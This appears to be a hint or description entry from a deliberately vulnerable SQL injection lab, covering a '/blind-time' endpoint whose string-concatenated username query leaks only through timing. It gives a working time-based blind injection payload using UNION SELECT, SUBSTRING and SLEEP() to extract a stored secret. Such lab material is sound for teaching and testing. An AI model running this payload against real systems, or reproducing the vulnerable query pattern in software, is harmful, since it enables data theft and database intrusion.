/blind-time · sink: string-concatenated SELECT (no response variation)
Username availability returns identical responses; only query time leaks.
Query: SELECT username FROM users WHERE username='<input>' LIMIT 1. Response is the same string either way. Use SLEEP() inside a UNION or AND clause: nonexistent' UNION SELECT IF(SUBSTRING((SELECT value FROM secrets WHERE name='sqli-blind-time'),1,1)='V', SLEEP(2), 'x')--